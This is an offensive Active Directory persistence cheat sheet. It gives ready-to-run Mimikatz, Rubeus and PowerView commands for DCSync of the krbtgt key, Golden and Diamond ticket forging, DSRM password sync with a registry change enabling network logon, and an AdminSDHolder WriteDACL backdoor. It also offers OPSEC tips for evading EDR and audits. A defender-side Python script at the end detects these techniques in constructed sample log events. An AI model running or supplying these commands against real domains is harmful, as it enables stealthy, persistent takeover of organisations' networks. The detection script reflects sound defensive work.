Persistence
Persistence OPSEC
Golden/Diamond/Silver Ticket, DSRM, AdminSDHolder
Golden Ticket (TGT Forgery)
Forging a TGT with a compromised krbtgt account: persistent access to the domain.
OPSEC: do not use RC4 (/rc4) and do not create a 10-year lifetime. Use AES-256 and the default 10-hour lifetime.
```powershell
# Step 1: obtain the krbtgt AES-256 key via DCSync
lsadump::dcsync /domain:domain.local /user:krbtgt
# Step 2: determine the domain SID natively
Get-DomainSID
# Step 3: create and inject an AES-256 Golden Ticket
.\Rubeus.exe golden /aes256:KRBTGT_AES256_KEY /domain:domain.local `
    /sid:S-1-5-21-XXXXXXX /user:Administrator /id:500 /ptt
```
Diamond Ticket (TGT Modification)
Instead of forging a TGT from scratch, modify a legitimately issued one. The PAC is correctly encrypted, so it looks 100% authentic to DCs.
Diamond Ticket is the stealthiest persistence method: in practice it cannot be distinguished from legitimate Kerberos traffic.
```powershell
# Request a legitimate TGT, modify the PAC with the krbtgt AES key, and inject it
.\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator `
    /ticketuserid:500 /groups:512 /krbkey:KRBTGT_AES256_KEY /ptt
```
DSRM Persistence (stealth alternative)
Synchronizing the Directory Services Restore Mode (DSRM) local administrator password with a domain account: persistent remote access to the DC without forging tickets.
DSRM accounts are not part of AD replication, so they do not show up in BloodHound or in standard AD audits.
```powershell
# Step 1: sync the DSRM password with krbtgt (run on the DC)
Invoke-Mimikatz -Command '"lsadump::setntlm /server:localhost /user:Administrator /sync:krbtgt"'
# Step 2: enable DSRM logon over the network in the registry
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" `
    -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
# Step 3: remote access to the DC via WMI or PSRemoting
sekurlsa::pth /domain:TargetDC /user:Administrator /ntlm:KRBTGT_NTLM_HASH /run:cmd.exe
```
AdminSDHolder Abuse (SDProp)
Leaving a persistent ACL entry on the protected groups (Domain Admins, Enterprise Admins). Every 60 minutes the SDProp process pushes the AdminSDHolder ACL onto all protected principals.
Do not grant GenericAll; GenericWrite or WriteDACL is stealthier and looks less suspicious during an AD audit.
```powershell
# Add a persistent WriteDACL right for a hidden low-privilege user
Add-DomainObjectAcl `
    -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" `
    -PrincipalIdentity backdoor_user -Rights WriteDacl
```
OPSEC Notes & Telemetry Matrix
| Technique | Risk | EDR Telemetry | OPSEC Mitigation |
|---|---|---|---|
| Golden Ticket (RC4) | Critical | No TGS-REQ. RC4 (0x17). Abnormal lifetime. | AES-256. Default 10-hour lifetime. |
| Golden Ticket (AES) | Medium | No TGS-REQ, but the encryption looks normal. | Use a normal lifetime. |
| Diamond Ticket | Very Low | Blends in with legitimate Kerberos traffic. | The stealthiest persistence method. |
| Silver Ticket | Low | Nothing in the DC logs. | Only local detection on the target machine. |
| DSRM Sync | Very Low | Registry change (DsrmAdminLogonBehavior). | Ordinary NTLM/Kerberos auth after setup. |
| AdminSDHolder | Medium | Event 5136 (Directory Service Changes). | May show up in a BloodHound audit. |
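A defender-side companion to the telemetry matrix, added here as an example and not part of the original cheat sheet: it runs the matrix's indicators (RC4 etype 0x17, a service-ticket request with no preceding TGT request from the same account and client, a change to the AdminSDHolder security descriptor, and a write to the DsrmAdminLogonBehavior registry value) over constructed Windows Security event records. The event IDs and field names are the standard Windows audit fields (4768, 4769, 5136, 4657); the 10-hour correlation window and the sample events are assumptions.

```python
from datetime import datetime, timedelta

RC4_HMAC = 0x17                     # Kerberos etype 23 (RC4-HMAC), the value the matrix calls out
TGT_LOOKBACK = timedelta(hours=10)  # default TGT lifetime; assumed window for 4768/4769 correlation
ADMINSDHOLDER = "cn=adminsdholder,cn=system"

def triage(events):
    """Return (rule, subject) alerts from parsed Security-log events given as dicts."""
    alerts = []
    tgt_seen = {}                   # (account, client ip) -> time of last successful 4768
    for e in sorted(events, key=lambda x: x["TimeCreated"]):
        eid, ts = e["EventID"], datetime.fromisoformat(e["TimeCreated"])
        user = e.get("TargetUserName", "").split("@")[0].lower()   # 4769 logs user@REALM
        if eid == 4768 and e.get("Status") == "0x0":
            tgt_seen[(user, e["IpAddress"])] = ts
        if eid in (4768, 4769) and int(e["TicketEncryptionType"], 16) == RC4_HMAC:
            alerts.append(("rc4_ticket", user))                     # RC4 where AES is the norm
        if eid == 4769:
            last = tgt_seen.get((user, e["IpAddress"]))
            if last is None or ts - last > TGT_LOOKBACK:            # this DC never issued the TGT
                alerts.append(("tgs_without_tgt", user))
        if eid == 5136 and ADMINSDHOLDER in e.get("ObjectDN", "").lower():
            alerts.append(("adminsdholder_acl_change", e["SubjectUserName"].lower()))
        if eid == 4657 and e.get("ObjectValueName") == "DsrmAdminLogonBehavior":
            alerts.append(("dsrm_logon_behavior", e["NewValue"]))
    return alerts

# Constructed sample events (not real telemetry) covering each rule at least once.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:00:00", "TargetUserName": "alice",
     "IpAddress": "10.0.0.5", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:01:00", "TargetUserName": "alice@DOMAIN.LOCAL",
     "IpAddress": "10.0.0.5", "TicketEncryptionType": "0x12"},        # benign: TGT was issued
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:05:00", "TargetUserName": "Administrator@DOMAIN.LOCAL",
     "IpAddress": "10.0.0.99", "TicketEncryptionType": "0x12"},       # AES, but no 4768 at all
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:10:00", "TargetUserName": "bob@DOMAIN.LOCAL",
     "IpAddress": "10.0.0.7", "TicketEncryptionType": "0x17"},        # RC4 and no 4768
    {"EventID": 5136, "TimeCreated": "2024-05-01T09:20:00", "SubjectUserName": "svc_backup",
     "ObjectDN": "CN=AdminSDHolder,CN=System,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4657, "TimeCreated": "2024-05-01T09:30:00", "ObjectValueName": "DsrmAdminLogonBehavior",
     "ObjectName": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Lsa", "NewValue": "2"},
]

if __name__ == "__main__":
    for rule, subject in triage(SAMPLE_EVENTS):
        print(f"{rule:26} {subject}")
```

The AES-encrypted Administrator ticket is only caught by the missing-4768 correlation, which is the check the matrix's "encryption looks normal" row relies on.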